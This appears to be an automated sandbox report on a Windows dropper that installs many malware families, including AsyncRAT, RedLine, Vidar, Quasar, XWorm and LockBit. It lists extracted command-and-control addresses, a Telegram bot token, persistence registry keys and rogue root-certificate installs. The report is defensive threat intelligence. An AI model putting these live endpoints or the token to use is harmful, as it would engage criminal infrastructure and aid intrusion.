asyncrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

14-11-2024 23:57

241114-3zzkpavhpf 10

14-11-2024 23:44

14-11-2024 23:36

14-11-2024 23:24

14-11-2024 23:10

Analysis

max time kernel
67s
max time network
310s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14-11-2024 23:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

newwwwwwwwwwwwwwwwww

185.16.38.41:2033

185.16.38.41:2034

185.16.38.41:2035

185.16.38.41:2022

185.16.38.41:2023

185.16.38.41:2024

185.16.38.41:20000

185.16.38.41:6666

Mutex

AsyncMutex_XXXX765643

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

redline

Botnet

TG@CVV88888

185.218.125.157:21441

Extracted

Family

vidar

Version

10.6

Botnet

1a72eb06939ea478753d5c4df4b2bd32

https://steamcommunity.com/profiles/76561199747278259

https://t.me/armad2a

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

96.248.52.125:8031

Mutex

adobe_6SI8OkPnk

Attributes

delay
3
install
true
install_file
update.exe
install_folder
%Temp%

aes.plain

Extracted

Family

redline

185.215.113.9:12617

Extracted

Family

cryptbot

fivexc5pt.top

analforeverlovyu.top

Attributes

url_path
/v1/upload.php

Extracted

Family

xworm

Version

3.1

Attributes

Install_directory
%Port%
install_file
USB.exe

Extracted

Family

stealc

Botnet

default_valenciga

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

quasar

Version

1.4.1

Botnet

Kurban

89.213.56.109:80

89.213.56.109:4782

Mutex

98b3deca-7447-4862-905a-28f904856d31

Attributes

encryption_key
705A067280199C09F2EC77A633F5E68C9020B7B5
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

xworm

crazyrdp.africa:7000

Attributes

install_file
USB.exe

Extracted

Family

xworm

Version

5.0

applications-scenario.gl.at.ply.gg:53694

Mutex

md2hTRMYBpbXprs1

Attributes

Install_directory
%AppData%
install_file
Steam.exe
pastebin_url
https://pastebin.com/raw/Pit7WkAV
telegram
https://api.telegram.org/bot7494729704:AAGLY8mnPxkjjCvoEz520yCBT4GLhlnhRaI/sendMessage?chat_id=7222032715

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

service

roidishek-42830.portmap.host:42830

Mutex

498ac5b7-8cc5-414e-b550-00c86c4ccf0f

Attributes

encryption_key
95C77D90C8A49F5740548C8A0A430C41732B639C
install_name
system.exe
log_directory
Logs
reconnect_delay
3000
startup_key
server chek
subdirectory
SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Detect Vidar Stealer 5 IoCs

stealer

resource	yara_rule
behavioral1/memory/2792-144-0x0000000003B20000-0x0000000003D63000-memory.dmp	family_vidar_v7
behavioral1/memory/2792-146-0x0000000003B20000-0x0000000003D63000-memory.dmp	family_vidar_v7
behavioral1/memory/2792-145-0x0000000003B20000-0x0000000003D63000-memory.dmp	family_vidar_v7
behavioral1/memory/2792-711-0x0000000003B20000-0x0000000003D63000-memory.dmp	family_vidar_v7
behavioral1/memory/2792-712-0x0000000003B20000-0x0000000003D63000-memory.dmp	family_vidar_v7

Detect Xworm Payload 6 IoCs

resource	yara_rule
behavioral1/memory/3520-1835-0x0000000000FA0000-0x0000000000FB6000-memory.dmp	family_xworm
behavioral1/memory/3664-1982-0x0000000000400000-0x000000000041A000-memory.dmp	family_xworm
behavioral1/memory/1652-4928-0x0000000000EB0000-0x0000000000EC0000-memory.dmp	family_xworm
behavioral1/memory/5516-4947-0x0000000000F00000-0x0000000000F42000-memory.dmp	family_xworm
behavioral1/files/0x000500000001ea15-5248.dat	family_xworm
behavioral1/files/0x000500000001fdfe-6793.dat	family_xworm

Detects ZharkBot payload 2 IoCs

ZharkBot is a botnet written C++.

resource	yara_rule
behavioral1/files/0x000700000001d937-1781.dat	zharkcore
behavioral1/files/0x000400000001e881-4951.dat	zharkcore

Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Lockbit family
lockbit
Phorphiex family
phorphiex

Phorphiex payload 4 IoCs

resource	yara_rule
behavioral1/files/0x000500000001a4f9-586.dat	family_phorphiex
behavioral1/files/0x000300000000f6f2-721.dat	family_phorphiex
behavioral1/files/0x000500000001c88a-948.dat	family_phorphiex
behavioral1/files/0x000400000001debb-2938.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 6 IoCs

resource	yara_rule
behavioral1/memory/3504-1920-0x0000000000AF0000-0x0000000000E14000-memory.dmp	family_quasar
behavioral1/files/0x000400000001da75-1961.dat	family_quasar
behavioral1/memory/3232-1963-0x0000000000B90000-0x0000000000EB4000-memory.dmp	family_quasar
behavioral1/memory/6736-5324-0x0000000000E50000-0x0000000001174000-memory.dmp	family_quasar
behavioral1/files/0x00040000000204e0-5414.dat	family_quasar
behavioral1/memory/7004-5428-0x0000000000360000-0x0000000000684000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 9 IoCs

resource	yara_rule
behavioral1/memory/1088-570-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral1/memory/1088-569-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral1/memory/1088-568-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral1/memory/1088-565-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral1/memory/1088-563-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral1/memory/2392-921-0x00000000000F0000-0x0000000000142000-memory.dmp	family_redline
behavioral1/memory/5480-2921-0x0000000000200000-0x000000000023E000-memory.dmp	family_redline
behavioral1/files/0x000700000001d8f1-5198.dat	family_redline
behavioral1/memory/2096-5213-0x00000000002B0000-0x0000000000302000-memory.dmp	family_redline

Redline family
redline

Rule to detect Lockbit 3.0 ransomware Windows payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000600000001da95-2053.dat	family_lockbit
behavioral1/files/0x000700000001da99-2878.dat	family_lockbit

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
ZharkBot
ZharkBot is a botnet written C++.
botnet zharkbot
Zharkbot family
zharkbot

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/files/0x000500000001a4e3-459.dat	family_asyncrat
behavioral1/files/0x000700000001c897-971.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1236	powershell.exe
1652	powershell.exe
3632	powershell.exe
6132	powershell.exe
3628	powershell.exe
1344	powershell.exe
4140	powershell.exe
6836	powershell.exe
4004	powershell.exe
1508	powershell.exe
5420	powershell.exe
1724	powershell.exe
3456	powershell.exe
8672	powershell.exe
3428	powershell.exe
4076	powershell.exe
5808	powershell.exe
4724	powershell.exe
6716	powershell.exe
5688	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
9928	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 1 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5764	chrome.exe

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x000500000001c8e2-1528.dat	aspack_v212_v242

Executes dropped EXE 14 IoCs

pid	Process
2608	PharmaciesDetection.exe
2792	Buyer.pif
2064	npp.exe
1804	gagagggagagag.exe
2344	cmaclient.exe
820	xyaw4fkp.exe
1936	ubi-inst.exe
2644	surfex.exe
908	ubi-inst.tmp
1988	ovrflw.exe
872	peinf.exe
2976	1578414444.exe
3024	mswabnet.exe
1004	sysnldcvmr.exe

Loads dropped DLL 17 IoCs

pid	Process
3056	4363463463464363463463463.exe
480	cmd.exe
3056	4363463463464363463463463.exe
3056	4363463463464363463463463.exe
3056	4363463463464363463463463.exe
3056	4363463463464363463463463.exe
3056	4363463463464363463463463.exe
3056	4363463463464363463463463.exe
3056	4363463463464363463463463.exe
1936	ubi-inst.exe
908	ubi-inst.tmp
3056	4363463463464363463463463.exe
3056	4363463463464363463463463.exe
2064	npp.exe
2064	npp.exe
1200	Process not Found
1200	Process not Found

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/4012-1932-0x0000000000C90000-0x0000000001858000-memory.dmp	themida
behavioral1/memory/4012-1933-0x0000000000C90000-0x0000000001858000-memory.dmp	themida
behavioral1/memory/4012-4146-0x0000000000C90000-0x0000000001858000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.89.198.214

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Network Agent = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft Network Agent\\mswabnet.exe\""	ovrflw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	1578414444.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
558	raw.githubusercontent.com
125	raw.githubusercontent.com
126	raw.githubusercontent.com
192	raw.githubusercontent.com
261	raw.githubusercontent.com
287	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
293	ip-api.com
809	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000600000001a4e7-505.dat	autoit_exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5400	tasklist.exe
5320	tasklist.exe
7436	tasklist.exe
2148	tasklist.exe
1628	tasklist.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2644 set thread context of 1088	2644	surfex.exe	72

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001dece-2951.dat	upx
behavioral1/memory/5800-3014-0x0000000000230000-0x00000000003AA000-memory.dmp	upx
behavioral1/memory/5800-4468-0x0000000000230000-0x00000000003AA000-memory.dmp	upx

Drops file in Windows directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\GamingNat	PharmaciesDetection.exe
File opened for modification	C:\Windows\PermitLite	PharmaciesDetection.exe
File opened for modification	C:\Windows\FacingLone	PharmaciesDetection.exe
File opened for modification	C:\Windows\GeniusRepeat	PharmaciesDetection.exe
File opened for modification	C:\Windows\MissWheat	PharmaciesDetection.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	1578414444.exe
File opened for modification	C:\Windows\TrainsSexcam	PharmaciesDetection.exe
File opened for modification	C:\Windows\JennyArtistic	PharmaciesDetection.exe
File opened for modification	C:\Windows\PolyphonicWeblog	PharmaciesDetection.exe
File opened for modification	C:\Windows\SgLaid	PharmaciesDetection.exe
File opened for modification	C:\Windows\EditedRights	PharmaciesDetection.exe
File opened for modification	C:\Windows\XiMilton	PharmaciesDetection.exe
File created	C:\Windows\sysnldcvmr.exe	1578414444.exe

Launches sc.exe 16 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3504	sc.exe
3600	sc.exe
1296	sc.exe
2872	sc.exe
2344	sc.exe
3476	sc.exe
2084	sc.exe
1604	sc.exe
3520	sc.exe
5660	sc.exe
2576	sc.exe
2556	sc.exe
5284	sc.exe
6668	sc.exe
3564	sc.exe
3960	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2188	3928	WerFault.exe	177
5160	1548	WerFault.exe	82
1920	6356	WerFault.exe	299

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PharmaciesDetection.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ubi-inst.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	surfex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gagagggagagag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1578414444.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Buyer.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	npp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ubi-inst.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4488	cmd.exe
5772	netsh.exe

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
2876	timeout.exe
3168	timeout.exe
3500	timeout.exe
6360	timeout.exe
7424	timeout.exe
3948	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5956	systeminfo.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	ubi-inst.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Buyer.pif
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Buyer.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	gagagggagagag.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	gagagggagagag.exe
